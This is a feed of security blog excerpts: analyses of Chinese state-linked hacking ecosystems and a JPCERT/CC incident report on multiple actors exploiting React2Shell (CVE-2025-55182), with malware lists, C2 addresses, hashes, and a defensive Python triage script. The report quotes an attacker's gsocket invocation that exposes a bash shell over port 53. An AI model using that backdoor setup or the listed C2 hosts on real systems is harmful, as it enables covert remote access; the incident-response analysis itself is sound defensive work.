(&#22235;&#24029;&#26234;&#20449;&#38160;&#25463;&#32593;&#32476;&#31185;&#25216;&#26377;&#38480;&#20844;&#21496;) - as suppliers of products and services to Salt Typhoon and other overlapping groups such as OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor. After examining these three Chinese companies and their possible roles in Salt Typhoon-related cyber operations, we presented a few questions worth further exploration. 
In this post, we will address questions about the involvement of Chinese companies in state-sponsored cyber operations and share some observations on threat attribution from the joint advisory.</p><h1>First, an update: The Company Webpage of Sichuan Zhixin Ruijie is Found</h1><p>Previously, the&#8230;</p> <p> <a href="https://www.nattothoughts.com/p/who-is-salt-typhoon-really-unraveling"> Read more </a> </p>
  29. Salt Typhoon: New Joint Advisory Offers a Beacon Through the Storm but Stirs Up New Questions

    Wed, 10 Sep 2025 16:03:20 -0000

    Analysis of newly identified Salt Typhoon-linked companies casts light on the complex ecosystem of front companies and real businesses supporting Chinese state cyber operations
    <figure><figcaption class="image-caption">Source: ChatGPT image</figcaption></figure><p>On August 27, 2025, the United States and 22 government agencies from 13 countries issued a <a href="https://media.defense.gov/2025/Aug/22/2003786665/-1/-1/0/CSA_COUNTERING_CHINA_STATE_ACTORS_COMPROMISE_OF_NETWORKS.PDF">Cybersecurity Advisory</a> entitled &#8220;<strong>Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System</strong>.&#8221; The advisory outlined the tactics, techniques, and procedures (TTPs) employed by advanced persistent threat (APT) actors whose activity partially overlaps with activity grouped under names such as Salt Typhoon, OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor.</p><p>The document identified three Chinese companies&#8212;<strong>Sichuan
Juxinhe Network Technology Co. Ltd.</strong> (&#22235;&#24029;&#32858;&#20449;&#21644;&#32593;&#32476;&#31185;&#25216;&#26377;&#38480;&#20844;&#21496;), <strong>Beijing Huanyu Tianqiong Information Technology Co., Ltd</strong>. (&#21271;&#20140;&#23536;&#23431;&#22825;&#31353;&#20449;&#24687;&#25216;&#26415;&#26377;&#38480;&#20844;&#21496;), and <strong>Sichuan Zhixin Ruijie Network Technology Co., Ltd</strong>. (&#22235;&#24029;&#26234;&#20449;&#38160;&#25463;&#32593;&#32476;&#31185;&#25216;&#26377;&#38480;&#20844;&#21496;)&#8212;that have supported these APT activities globally since at least 2021. These organizations reportedly supplied cyber-related products and services to China&#8217;s intelligence entities, including units within the People&#8217;s Liberat&#8230;</p> <p> <a href="https://www.nattothoughts.com/p/salt-typhoon-new-joint-advisory-offers"> Read more </a> </p>
  30. No Ranges, No Bounties, No Contests: Forging Offensive Capabilities in China’s 2000s Hacker Scene

    Wed, 27 Aug 2025 16:03:08 -0000

    China&#8217;s early hacking training grounds weren&#8217;t classrooms or hacking contests, but online forums, real-world targets, and freely shared offensive tools and vulnerabilities.
    <p><em>This post is adapted from the Cyberdefense Report <a href="https://ethz.ch/content/dam/ethz/special-interest/gess/cis/center-for-securities-studies/pdfs/before-vegas-cyberdefense-report.pdf">"Before Vegas: The &#8216;Red Hackers&#8217; Who Shaped China&#8217;s Cyber Ecosystem,"</a> published in July 2025 by the Center for Security Studies (CSS) at ETH Zurich, Switzerland.</em></p><p>In our <a href="https://nattothoughts.substack.com/p/few-and-far-between-during-chinas">last piece</a>, we showed how truly elite offensive cyber talent has always been scarce, even within China&#8217;s massive hacker communities of the 2000s. But how did this small circle of talent actually develop offensive capabilities? In China, these fall under the broader category of &#8220;live-fire&#8221; capabilities (&#23454;&#25112;&#33021;&#21147;),<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> i.e. the ability to apply tools and techniques such as penetration testing, security operations, and incident response. As we discussed <a href="https://nattothoughts.substack.com/p/the-matrix-cup-cultivating-top-hacking">here</a>, <a href="https://nattothoughts.substack.com/p/business-priorities-of-chinese-cyber">here</a>, and <a href="https://nattothoughts.substack.com/p/butian-vulnerability-platform-forging">here</a>, hacking contests, bug bounty platforms, and cyber ranges have become core pillars of China&#8217;s modern live-fire talent pipeline. Today, these mechanisms are deeply institutionalized across universities, companies, and state-backed initiatives, serving as the backbone for identifying and training skilled operators.</p> <p> <a href="https://www.nattothoughts.com/p/no-ranges-no-bounties-no-contests"> Read more </a> </p>
  31. Few and Far Between: During China’s Red Hacker Era, Patriotic Hacktivism Was Widespread—Talent Was Not

    Wed, 13 Aug 2025 16:02:26 -0000

    Inside the small, elite circles that powered China&#8217;s massive hacker communities in the late 1990s and 2000s.
    <p><em>This post is excerpted from the Cyberdefense Report <a href="https://css.ethz.ch/en/center/CSS-news/2025/07/before-vegas-the-red-hackers-who-shaped-chinas-cyber-ecosystem.html">"Before Vegas: The &#8216;Red Hackers&#8217; Who Shaped China&#8217;s Cyber Ecosystem,"</a> published in July 2025 by the Center for Security Studies (CSS) at ETH Zurich, Switzerland.</em></p><p>Truly elite offensive cyber talent has always been rare. Despite the growth of cybersecurity communities worldwide, and the emergence of extensive and structured talent pipelines in countries like China &#8211; examined in Natto pieces <a href="https://nattothoughts.substack.com/p/the-matrix-cup-cultivating-top-hacking">1</a>, <a href="https://nattothoughts.substack.com/p/when-a-vocational-college-becomes">2</a> and <a href="https://nattothoughts.substack.com/p/debating-chinas-ai-path-alternative">3</a> &#8211; which have made high-quality talent more widely available, truly exceptional individuals remain scarce and highly sought after.</p><p>As early as 2013, the <a href="https://www.airuniversity.af.edu/CASI/Display/Article/2485204/plas-science-of-military-strategy-2013/">Science of Military Strategy</a>&#8212;a foundational text published by the PLA Academy of Military Science&#8212;noted that while cyber warfare benefits from a &#8220;broad mass base,&#8221; the traditional Chinese military ideal of &#8220;all people are soldiers&#8221; does not translate to cyberspace.
Instead, it emphasized that only an &#8220;<a href="https://www.bloomsburycollections.com/monograph-detail?docid=b-9798881817602&amp;pdfid=9798881817602.ch-8.pdf&amp;tocid=b-9798881817602-chapter8">extremely lean</a>&#8221; cohort possessed the capabilities required for high-level cyber operations.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a></p><p>&#8230;</p> <p> <a href="https://www.nattothoughts.com/p/few-and-far-between-during-chinas"> Read more </a> </p>
  32. When Privileged Access Falls into the Wrong Hands: Chinese Companies in Microsoft’s MAPP Program

    Thu, 31 Jul 2025 16:32:47 -0000

    Chinese companies face conflicting pressures between MAPP&#8217;s non-disclosure requirements and domestic policies that incentivize or mandate vulnerability disclosure to the state.
    <p>On July 25, 2025, Bloomberg <a href="https://www.bloomberg.com/news/articles/2025-07-25/microsoft-sharepoint-hack-probe-on-whether-chinese-hackers-found-flaw-via-alert?srnd=undefined">reported</a> that Microsoft is investigating whether a leak from its Microsoft Active Protections Program (MAPP) allowed Chinese hackers to exploit a SharePoint vulnerability before a patch was released. Microsoft attributed the campaign &#8211; dubbed &#8220;ToolShell&#8221; after the custom remote access trojan used &#8211; to three China-linked threat actors: Linen Typhoon, Violet Typhoon, and Storm-2603. The attackers reportedly compromised over 400 organizations worldwide, including the U.S. National Nuclear Security Administration.</p><p>Launched in 2008, MAPP is designed to reduce the time between the discovery of a vulnerability and the deployment of patches. By giving trusted security vendors early access to technical details about upcoming patches, Microsoft enables them to release protections (such as antivirus signatures and intrusion detection rules) in sync with its monthly updates. The program, however, relies on strict compliance with non-disclosure agreements and the secure &#8230;</p> <p> <a href="https://www.nattothoughts.com/p/when-privileged-access-falls-into"> Read more </a> </p>
  33. HAFNIUM-Linked Hacker Xu Zewei: Riding the Tides of China’s Cyber Ecosystem

    Wed, 23 Jul 2025 16:01:48 -0000

    How one man&#8217;s career reveals the interconnected web of China&#8217;s state security apparatus, cybersecurity firms, and strategic industries
    <p>On July 3, 2025, at Milan Malpensa Airport, <a href="https://www.ansa.it/english/newswire/english_service/2025/07/07/ansachinese-spy-arrested-in-italy-on-us-warrant_9f5bbfe6-74ef-4f78-bb1e-fcf01f755652.html">Italian police arrested</a> <strong>Xu Zewei</strong> (<strong>&#24464;&#27901;&#20255;</strong>), whom U.S. authorities allege to be a hacker contracted by the Chinese state. Following the news about Xu&#8217;s arrest from Italian media, on July 8, the U.S. Department of Justice (US DoJ) issued a <a href="https://www.justice.gov/opa/pr/justice-department-announces-arrest-prolific-chinese-state-sponsored-contract-hacker">press release</a> and unsealed an <a href="https://www.justice.gov/opa/media/1407196/dl">indictment</a>, accusing Xu Zewei and his co-defendant <strong>Zhang Yu</strong> (<strong>&#24352;&#23431;</strong>) of participating in hacking activities between February 2020 and June 2021. These activities were reportedly linked to the Advanced Persistent Threat (APT) group <strong><a href="https://attack.mitre.org/groups/G0125/">HAFNIUM</a></strong> (also known as Silk Typhoon or APT27), involving the theft of COVID-19 research from universities, exploitation of Microsoft Exchange Server vulnerabilities, and compromising thousands of computers worldwide, including those in the United States. As of this writing, Xu remains in custody near Milan and is undergoing extradition proceedings to the United States. During his initial court appearance, <a href="https://www.cnn.com/2025/07/08/politics/us-extradition-chinese-man-accused-hacking-covid-research">Xu asserted</a> that he &#8220;has nothing to do with the case,&#8221; &#8230;</p> <p> <a href="https://www.nattothoughts.com/p/hafnium-linked-hacker-xu-zewei-riding"> Read more </a> </p>
  34. Pick Your Innovation Path in AI: Chinese Edition

    Wed, 09 Jul 2025 16:01:31 -0000

    China&#8217;s advances in AI show the effects of a state approach of &#8220;introduce, digest, absorb, re-innovate&#8221; and years of debate on the balance between market-driven innovation and state-led development
    <p><em>When the Chinese start-up <a href="https://api-docs.deepseek.com/news/news1210">DeepSeek launched</a> its artificial intelligence (AI) chatbot in December 2024, many Americans suddenly realized that <a href="https://www.nytimes.com/2025/05/19/opinion/china-us-trade-tariffs.html">China could compete in AI.</a> News of this breakthrough sparked debate on whether <a href="https://www.wired.com/story/stanford-study-global-artificial-intelligence-index/">China could win the AI race</a> and <a href="https://www.economist.com/china/2025/05/25/xi-jinpings-plan-to-overtake-america-in-ai">surpass the dominance</a> of the United States in AI and on <a href="https://www.foreignaffairs.com/united-states/what-if-china-wins-ai-race">the implications if China were to succeed.</a> In April 2025, Chinese President Xi Jinping delivered <a href="https://cset.georgetown.edu/publication/xi-politburo-collective-study-ai-2025/">remarks</a> on artificial intelligence during a Politburo study session on AI, Xi&#8217;s first pronouncement on the subject since 2018. &#8220;Persist in Being Self-Reliant, Be Strongly Oriented Toward Applications, and Push the Orderly Development of Artificial Intelligence,&#8221; was Xi&#8217;s main message, according to a Chinese state media summary of his speech. <a href="https://digichina.substack.com/p/xis-ai-message-to-the-politburo-analyzed">Experts suggested</a> that Xi&#8217;s comments signaled China&#8217;s determination to achieve AI supremacy. China has come a long way since the release of the State Council&#8217;s <a href="https://www.newamerica.org/cybersecurity-initiative/digichina/blog/full-translation-chinas-new-generation-artificial-intelligence-development-plan-2017/">New Generation Artificial Intelligence Development Plan</a> in 2017. Back then, Chinese schola&#8230;</em></p> <p> <a href="https://www.nattothoughts.com/p/debating-chinas-ai-path-alternative"> Read more </a> </p>
  35. Butian Vulnerability Platform: Forging China's Next Generation of White Hat Hackers

    Wed, 25 Jun 2025 16:01:18 -0000

    From 'Trouser Belt Project' to 'Patching the Sky': Qi An Xin&#8217;s Butian platform serves as cradle for nurturing new talent and smelter for refining seasoned hackers&#8217; skills
    <p>In our <a href="https://nattothoughts.substack.com/p/defense-through-offense-mindset-from">previous posting</a>, Natto Thoughts pointed out the Chinese cyberdefense mindset that, in order to protect one's own business or country, one needs to develop offensive skills. In other postings, the Natto Team has profiled various <a href="https://nattothoughts.substack.com/p/when-a-vocational-college-becomes">institutes</a>, <a href="https://nattothoughts.substack.com/p/business-priorities-of-chinese-cyber">cyber ranges</a>, <a href="https://nattothoughts.substack.com/p/the-pangu-teamios-jailbreak-and-vulnerability">vulnerability research labs</a>, and <a href="https://nattothoughts.substack.com/p/the-matrix-cup-cultivating-top-hacking">hacking competitions</a> that companies sponsor in order to nurture China's defensive talent through "attack-defense live-fire exercises" (&#25915;&#38450;&#23454;&#25112;&#28436;&#20064;) and other offensive skills. One prominent entity that brings these all together and has helped set the standard for this type of training is the <a href="https://www.butian.net/">Butian (or Bu Tian) Vulnerability Response Platform</a> (&#34917;&#22825;&#28431;&#27934;&#21709;&#24212;&#24179;&#21488;) (Butian Platform). It appears designed to coopt would-be black-hat criminal hackers and young students and mold them into socially useful white-hat hackers, training them to defend China. Along the way, they also develop skills that can be used offensively against China's enemies. The term &#8220;white hat talent&#8221; (&#30333;&#24125;&#20154;&#25165;) has been frequently used in the Chin&#8230;</p> <p> <a href="https://www.nattothoughts.com/p/butian-vulnerability-platform-forging"> Read more </a> </p>
  36. Defense-Through-Offense Mindset: From a Taiwanese Hacker to the Engine of China’s Cybersecurity Industry

    Wed, 11 Jun 2025 16:03:00 -0000

    The belief that offense enables defense in cyberspace, first rooted in China&#8217;s 1990s hacker culture, has since permeated the country&#8217;s cyber ecosystem
    <p>Across the globe, a core tenet is gradually gaining traction in the cyber domain: passive defense alone is not enough. A limited but growing number of states have embraced some form of active defense&#8212;the idea that effective cybersecurity requires not just detection and response, but also preemptive action to disrupt adversaries.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a></p><p>In the United States, this principle is formally codified in the 2018 Department of Defense Cyber Strategy under the doctrine of &#8220;Defend Forward,&#8221; authorizing U.S. Cyber Command and the NSA to proactively disrupt threats within adversaries&#8217; own networks. Variations of this approach <a href="https://www.darkreading.com/cybersecurity-operations/japan-offense-new-cyber-defense-bill">have since been adopted</a> by other governments. In China, the concept of active defense <a href="https://www.andrewerickson.com/wp-content/uploads/2019/05/DoD_China-Report_2019.pdf">is grounded</a> in longstanding military strategy. Although this principle extends to cyberspace - <a href="https://www.gov.cn/zhengce/2015-05/26/content_2868988.htm#">as outlined in China&#8217;s 2015 military strategy</a> - China has not yet articulated a dedicated active cyber defense doctrine comparable to that of the United States.</p><p>Yet in practice, China&#8217;s cyber ecosystem refl&#8230;</p> <p> <a href="https://www.nattothoughts.com/p/defense-through-offense-mindset-from"> Read more </a> </p>
  37. From Humble Beginnings: How a Vocational College Became a Vulnerability Powerhouse

    Wed, 28 May 2025 16:01:52 -0000

    Qingyuan Polytechnic's focus on vulnerability studies highlights China's continued efforts in gathering vulnerability resources
    <p>In one of the <a href="https://nattothoughts.substack.com/p/i-soon-kicking-off-the-year-of-the">famously leaked chat messages</a> among members of i-SOON &#8211; the Chinese information security company allegedly linked to the <a href="https://www.fbi.gov/wanted/cyber/aquatic-panda-cyber-threat-actors">AQUATIC PANDA</a> threat group &#8211; group leader <a href="https://nattothoughts.substack.com/i/142403030/alternative-route-to-recruit">&#8220;Shutdown&#8221; declared</a> in 2020, &#8220;People who have attack and defense live-fire capabilities do not need degrees from elite universities.&#8221; He called for recruiting talented students from less-prestigious technical or regional educational institutions. One such institution rocketed to prominence on May 16 of this year. Qingyuan Polytechnic &#8211; a vocational school from a third-tier city<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> &#8211; was one of three higher education institutes honored as Outstanding Universities of the Year for Cooperation at the <a href="https://www.cnnvd.org.cn/home/childHome">China National Vulnerability Database of Information Security</a> (CNNVD)&#8217;s <a href="https://www.secrss.com/articles/78809">2024 Annual Work Review and Outstanding Recognition Conference</a>.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-2" href="#footnote-2" target="_self">2</a> The other recipients were Beihang University (&#21271;&#20140;&#33322;&#31354;&#33322;&#22825;&#22823;&#23398;) and Guangzhou University (&#24191;&#24030;&#22823;&#23398;), both well-known four-year universities.</p><p>At the conference, a number of prominent information securi&#8230;</p> <p> <a href="https://www.nattothoughts.com/p/when-a-vocational-college-becomes"> Read more </a> </p>
  38. A Compromise by Multiple Threat Actors Exploiting React2Shell

    Fri, 13 Feb 2026 02:00:00 -0000

    On December 3, 2025 (local time), React Server Components...
    <p>2025年12月3日(現地時間)、React Server Components(RSC)における認証不要のリモートコード実行の脆弱性(<a href="https://www.jpcert.or.jp/newsflash/2025120501.html" target="_blank">CVE-2025-55182</a>)が公開されました。JPCERT/CCでは、この攻撃の被害報告を複数受けています。その中で、本脆弱性を短期間のうちに複数の攻撃アクターに悪用され、Webサイト改ざんなど複数の被害が同時に発生した事案がありました。今回は容易に悪用可能な脆弱性が公表された場合に、攻撃者がいかに迅速かつ無差別に攻撃を行っているかを攻撃のタイムラインや使用されたマルウェアの紹介とあわせて解説します。このような深刻な脆弱性が公開された場合に、どのくらいのスピード感で対策を進めなければならないかという参考になればと思います。</p> <h3>攻撃のタイムライン</h3> <p>表1は今回紹介する事案で判明した攻撃のタイムラインです。(被害組織の特定につながる恐れがあるため、以降の一部のURLパスや識別子などはマスクしています)</p> <table border="1" width="100%"> <caption>表1:攻撃のタイムライン</caption> <thead> <tr> <th><div style="text-align: center;">日時(JST)</div></th> <th><div style="text-align: center;">内容</div></th> </tr> </thead> <tbody> <tr> <td align="left">2025-12-05 15:52</td> <td>コインマイナー(sex.sh、xmrig)の設置</td> </tr> <tr> <td align="left">2025-12-06 07:28</td> <td>コインマイナー(sex.sh.1)の設置</td> </tr> <tr> <td align="left">2025-12-06 09:53、10:09、11:00</td> <td>HISONIC(javax)バックドアの設置</td> </tr> <tr> <td align="left">2025-12-06 15:00</td> <td>Global Socket(npm-cli)をcron経由で毎時実行</td> </tr> <tr> <td align="left">2025-12-06 19:31</td> <td>SNOWLIGHTのダウンローダー(javas)、CrossC2(rsyslo)の設置</td> </tr> <tr> <td align="left">2025-12-07 12:24</td> <td>コインマイナー(xmrig)の設置</td> </tr> <tr> <td align="left">2025-12-07 16:51</td> <td>/tmp/kernal(kernelに偽装)を毎分実行するようにcron設定を書き替え</td> </tr> <tr> <td align="left">2025-12-07 19:46</td> <td>サイト改ざん(警告メッセージの表示)</td> </tr> <tr> <td align="left">2025-12-07 22:15</td> <td>サービス利用者からの報告によって発覚</td> </tr> </tbody> </table> <p>React2Shellの脆弱性が2025年12月3日に公開されてからわずか2日後にはコインマイナーの設置を狙った攻撃が行われており、それを皮切りに複数の攻撃者によってRATやバックドアなどのさまざまなマルウェアが設置・実行され、一つのサーバー上に複数の攻撃者が侵入している状況が見られました。 <br /> また、上記のタイムライン以外にも、2025年12月5日~7日の期間でWebサーバーのアクセスログ上に100を超えるIPアドレスからReact2Shellの脆弱性を狙ったと思われる不審なHTTP POST通信(アクセスログにはリクエストヘッダーやPOSTデータは記録されていなかったため、UserAgentやリクエストパス、レスポンスサイズなどをもとに推定)が観測されており、実際にはさらに多くの攻撃者から侵害を受けていた可能性もあります。</p> <h3>発端となったWebサイト改ざん</h3> 
<p>In this case, the compromise came to light when a visitor to the website reported that it had been defaced by the attacker. The defaced site displayed a warning in four languages to the effect of "the CVE-2025-55182 vulnerability is present, so the patch must be applied immediately." Figure 1 shows an example of a defaced web page.</p>
<p><figure class="mt-figure mt-figure-center"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/react2shell-fig1-640wri.png" width="800" height="347" alt="" class="asset asset-image at-xid-1862911 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/><figcaption>Figure 1: Defaced web page</figcaption></figure></p>
<p>The same defacement has been observed on multiple websites both in Japan and abroad, and in every case the text urged prompt remediation of the vulnerability. Figure 2 shows an example of a defaced site as it appeared in search engine results.</p>
<p><figure class="mt-figure mt-figure-center"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/react2shell-fig2-640wri.png" width="800" height="398" alt="" class="asset asset-image at-xid-1862911 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/><figcaption>Figure 2: Google search results</figcaption></figure></p>
<h3>Malware placed on the server</h3>
<p>A variety of malware and open source tools were abused in this case. Table 2 lists the malware that was placed on the server (configuration files and similar are excluded).</p>
<table border="1" width="100%">
<caption>Table 2: Malware placed on the server</caption>
<thead> <tr> <th><div style="text-align: center;">No.</div></th> <th><div style="text-align: center;">File name</div></th> <th><div style="text-align: center;">Description</div></th> </tr> </thead>
<tbody>
<tr> <td>1</td> <td>sex.sh</td> <td>bash script to download xmrig</td> </tr>
<tr> <td>2</td> <td>sex.sh.1</td> <td>bash script to download xmrig</td> </tr>
<tr> <td>3</td> <td>miner.sh</td> <td>bash script to launch xmrig</td> </tr>
<tr> <td>4</td> <td>xmrig</td> <td>xmrig coin miner</td> </tr>
<tr> <td>5</td> <td>javax</td> <td>HISONIC backdoor</td> </tr>
<tr> <td>6</td> <td>javas</td> <td>bash script to download SNOWLIGHT</td> </tr>
<tr> <td>7</td> <td>rsyslo</td> <td>CrossC2 RAT</td> </tr>
<tr> <td>8</td> <td>npm-cli</td> <td>Global Socket tool</td> </tr>
<tr> <td>9</td> <td>kernal</td> <td>Details unknown because the file had been deleted</td> </tr>
</tbody>
</table>
<p>Of particular interest, in addition to the usual financially motivated coin miner, we observed a downloader for SNOWLIGHT<a href="#1">[1]</a>, which is reported to be used by UNC5174; the Golang-based HISONIC backdoor<a href="#2">[2]</a>, reported to be used by UNC6603; and the CrossC2 RAT<a href="#3">[3]</a>, a Linux implementation of Cobalt Strike, which was placed at the same time as SNOWLIGHT. The attacker's exact objective is unknown, but it is possible that the compromised server was intended to serve as infrastructure for future attacks. <br /> We also observed abuse of the open source tool Global Socket (gsocket)<a href="#4">[4]</a>, something rarely reported in cases published by other security vendors. This tool allows two hosts that cannot reach each other directly, for example because they sit behind NAT or a firewall, to connect through a relay network called the GSRN (Global Socket Relay Network). Hosts that hold the same pre-shared key can communicate with each other; the traffic is end-to-end encrypted, and the GSRN relays only the encrypted traffic. <br /> In this case the attacker ran the tool with the environment variables and options shown below, using npm-cli.dat as the secret file and abusing the tool as a backdoor that could be operated from outside via bash over port 53, the port normally used for DNS.</p>
<pre>
GS_PORT='53' SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /home/***/.config/dbus/npm-cli.dat -liqD"
</pre>
<h3>Closing</h3>
<p>The React2Shell vulnerability was incorporated into attack tooling quickly after its disclosure, and within only a few days it was observed being exploited by many actors. Attackers exploit vulnerabilities very quickly, so when a critical vulnerability is published it is important to promptly determine the scope of impact and apply patches or other countermeasures. <br /> When responding to a vulnerability that is known to be exploited, it is also necessary to check for signs of compromise alongside patching. As in this case, a more serious compromise may lie behind a visible defacement, so we recommend carefully investigating whether any other parts of the environment have been affected. <br /> The network destinations and other indicators of the malware described in this article are listed in the Appendix.</p>
<p style="text-align: right;">Incident Response Group: 喜野孝太, 矢野雄紀</p>
<h3>References</h3>
<p><a name="1"></a>[1] UNC5174's Windows malware SNOWLIGHT <br /> <a href="https://sect.iij.ad.jp/blog/2025/11/unc5174-windows-snowlight-in-2025/" target="_blank" rel="noopener">https://sect.iij.ad.jp/blog/2025/11/unc5174-windows-snowlight-in-2025/</a></p>
<p><a name="2"></a>[2] Multiple Threat Actors Exploit React2Shell (CVE-2025-55182) <br /> <a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182" target="_blank" rel="noopener">https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182</a></p>
<p><a name="3"></a>[3] Attacks using "CrossC2", a tool that extends Cobalt Strike Beacon functionality across platforms <br /> <a href="https://blogs.jpcert.or.jp/ja/2025/08/crossc2.html" target="_blank" rel="noopener">https://blogs.jpcert.or.jp/ja/2025/08/crossc2.html</a></p>
<p><a name="4"></a>[4] Global Socket <br /> <a href="https://github.com/hackerschoice/gsocket" target="_blank" rel="noopener">https://github.com/hackerschoice/gsocket</a></p>
<h4>Appendix A: Network destinations</h4>
<table border="1" width="100%">
<thead> <tr> <th><div style="text-align: center;">No.</div></th> <th><div style="text-align: center;">Destination</div></th> <th><div style="text-align: center;">Purpose</div></th> </tr> </thead>
<tbody>
<tr> <td>1</td> <td>45.143.131[.]123:59999</td> <td>SNOWLIGHT download source / C2 server</td> </tr>
<tr> <td>2</td> <td>154.89.152[.]240:443</td> <td>CrossC2 C2 server</td> </tr>
</tbody>
</table>
<h4>Appendix B: Malware hashes</h4>
<table border="1" width="100%">
<thead> <tr> <th><div style="text-align: center;">No.</div></th> <th><div style="text-align: center;">Hash (SHA-256)</div></th> <th><div style="text-align: center;">File name</div></th> </tr> </thead>
<tbody>
<tr> <td>1</td> <td>5bae25736a09de5f4a0f9761d2b7bfa81ca8dba39de2a724473c9d021a65daa9</td> <td>sex.sh</td> </tr>
<tr> <td>2</td> <td>ba43e447e63611d365300bf2e8e43ccb02ea112778d0d555ef9a9ccf6169808b</td> <td>sex.sh</td> </tr>
<tr> <td>3</td> <td>ac3e12fa0aa4d6e4eed322e81ecf708a8c9bea29247ae6b26cc39d3b3a6c2fb8</td> <td>miner.sh</td> </tr>
<tr> <td>4</td> <td>a536d755313ce550a510137211eca6171f636fb316026e9df8523c496c8fcd12</td> <td>xmrig</td> </tr>
<tr> <td>5</td> <td>0c748b9e8bc6b5b4fe989df67655f3301d28ef81617b9cbe8e0f6a19d4f9b657</td> <td>xmrig</td> </tr>
<tr> <td>6</td> <td>1a1edbea47162b1aa844252fcd4fb97f2a67faec1993e7819efc6a04b7c15552</td> <td>javax</td> </tr>
<tr> <td>7</td> <td>0d07a974993221305ca7af139b73d9de1dcd992f553215e4f041e830a2d82729</td> <td>javas</td> </tr>
<tr> <td>8</td> <td>5baa52387daedea5e3e00adf96ecacb4a2cdc98100664f29ac86e8e4a423baaf</td> <td>54ad0ee3tcp</td> </tr>
<tr> <td>9</td> <td>c1a9cfc62626118bd9f54e401fd52ecd2d766a5e8a69dbc7db909ea5c987fcc0</td> <td>54ad0ee3tcp</td> </tr>
<tr> <td>10</td> <td>4a74676bd00250d9b905b95c75c067369e3911cdf3141f947de517f58fc9f85c</td> <td>rsyslo</td> </tr>
<tr> <td>11</td> <td>cb5f62bf7b591e69bd38e6bf8e40e8d307d154b2935703422d44f02e403d2e78</td> <td>npm-cli</td> </tr>
</tbody>
</table>
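<p>The gsocket environment variables quoted above (GS_PORT, GS_ARGS with a secret file and clustered short options) and the Appendix B hashes are the two cheapest things to sweep a Linux host for. The following is an added triage example written for this article; it is not JPCERT/CC code or part of gsocket. The process records and file contents are constructed, the SHA-256 values come from Appendix B, and the meanings given for the short options (-l listen, -i interactive shell, -q quiet, -D daemon) are taken from the gs-netcat usage text as I recall it, so treat them as an assumption to verify against the tool's own help output.</p>

```python
"""Triage helpers for the gsocket backdoor and file IoCs described in the article.

Added example, not JPCERT/CC code. Process records and file contents are
constructed; the SHA-256 values are copied from Appendix B of the article.
"""
import hashlib
import re
from typing import Dict, List

# SHA-256 -> file name, from Appendix B (a subset is enough to show the mechanism).
IOC_SHA256 = {
    "5bae25736a09de5f4a0f9761d2b7bfa81ca8dba39de2a724473c9d021a65daa9": "sex.sh",
    "4a74676bd00250d9b905b95c75c067369e3911cdf3141f947de517f58fc9f85c": "rsyslo",
    "cb5f62bf7b591e69bd38e6bf8e40e8d307d154b2935703422d44f02e403d2e78": "npm-cli",
}

# Meaning of the short options seen in the article's GS_ARGS value
# (assumption: taken from gs-netcat's usage text, verify against your copy).
GS_FLAG_MEANING = {"l": "listen/server mode", "i": "interactive shell",
                   "q": "quiet", "D": "daemon/watchdog"}
SECRET_FILE_RE = re.compile(r"(?:^|\s)-k\s+(\S+)")


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def gsocket_findings(proc: Dict) -> List[str]:
    """Return the reasons a process record looks like a gsocket backdoor.

    `proc` is {"pid": int, "cmd": str, "environ": {name: value}}, i.e. what you
    would assemble from `ps` and /proc/<pid>/environ. Empty list = nothing found.
    """
    env = proc.get("environ", {})
    gs_vars = {k: v for k, v in env.items() if k.startswith("GS_")}
    if not gs_vars:
        return []
    reasons = ["GS_* environment present: " + ", ".join(sorted(gs_vars))]
    args = gs_vars.get("GS_ARGS", "")
    m = SECRET_FILE_RE.search(args)
    if m:
        reasons.append("pre-shared secret file: " + m.group(1))
    # Short options may be clustered ("-liqD"): expand them and explain the known ones.
    letters = "".join(t[1:] for t in args.split()
                      if t.startswith("-") and not t.startswith("--") and t != "-k")
    for ch in letters:
        if ch in GS_FLAG_MEANING:
            reasons.append(f"-{ch}: {GS_FLAG_MEANING[ch]}")
    port = gs_vars.get("GS_PORT", "").strip("'\"")
    if port == "53":
        reasons.append("GS_PORT=53: relay traffic on the DNS port")
    if env.get("SHELL", "").endswith("/bash") and "i" in letters:
        reasons.append("interactive shell exposed via bash")
    return reasons


def match_iocs(files: Dict[str, bytes], table: Dict[str, str] = IOC_SHA256) -> Dict[str, str]:
    """Map each path whose SHA-256 appears in `table` to the IoC file name."""
    hits = {}
    for path, content in files.items():
        digest = sha256_hex(content)
        if digest in table:
            hits[path] = table[digest]
    return hits


# Constructed process records (not real telemetry); the home directory is made up.
SAMPLE_PROCS = [
    {"pid": 4242, "cmd": "/home/web/.config/dbus/npm-cli",
     "environ": {"GS_PORT": "53", "SHELL": "/bin/bash", "TERM": "xterm-256color",
                 "GS_ARGS": "-k /home/web/.config/dbus/npm-cli.dat -liqD"}},
    {"pid": 1001, "cmd": "/usr/sbin/rsyslogd -n",
     "environ": {"PATH": "/usr/sbin:/usr/bin", "LANG": "C"}},
]

if __name__ == "__main__":
    for p in SAMPLE_PROCS:
        for reason in gsocket_findings(p):
            print(f"pid {p['pid']} ({p['cmd']}): {reason}")
    print(match_iocs({"/tmp/sample": b"constructed content"}))
```

On a live host the environ dictionary comes from <code>/proc/&lt;pid&gt;/environ</code> (NUL-separated), which survives even when the binary on disk has been renamed to something innocuous like <code>npm-cli</code>; the hash check is the complement for files that are still present.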
  39. Release of training content for Windows event log analysis

    Tue, 10 Feb 2026 02:00:00 -0000

    Introduction JPCERT/CC has published training material on methods for investigating security incidents (hereinafter...
